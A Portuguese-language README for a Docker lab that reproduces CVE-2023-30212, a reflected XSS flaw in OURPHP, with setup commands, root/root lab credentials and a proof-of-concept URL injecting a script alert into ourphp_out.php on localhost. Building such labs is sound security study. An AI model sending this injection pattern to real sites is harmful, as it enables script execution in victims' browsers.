
# Laboratório OURPHP vulnerável baseado em Docker para reproduzir a CVE-2023-30212, uma vulnerabilidade de XSS refletido, com instruções de configuração e URL de exploit de prova de conceito.
Pré-requisito
Baixar docker.io
sudo apt install -y docker.io
Baixe todos os arquivos do meu repositório usando o comando abaixo.
git clone https://github.com/AAsh035/CVE-2023-30212.git
Agora, para criar uma imagem docker, execute o seguinte comando:
sudo docker build -t vuln .
Em seguida, transforme a imagem docker em um container. O container precisa rodar na porta 80. O comando é:
sudo docker run -d -p 80:80 vuln
Para verificar se o container está ativo, use o comando:
sudo docker ps
Digite 127.0.0.1 no navegador e uma página OURPHP será carregada.
Você precisa configurar o ourphp com o seguinte:
Nome de usuário : root
Senha : root
Nome do banco de dados: vuln
Agora você precisa configurar o nome de usuário e senha para Administrativo. Defina o seguinte:
Nome de usuário: root
Senha: root
Agora copie o link abaixo e cole no navegador:
http://localhost/client/manage/ourphp_out.php?ourphp_admin=logout&out=</script><script>alert("bug")</script>
https://github.com/AAsh035/CVE-2023-30212/assets/136836668/218c8eca-f02b-41b2-931b-ba112da6c7e0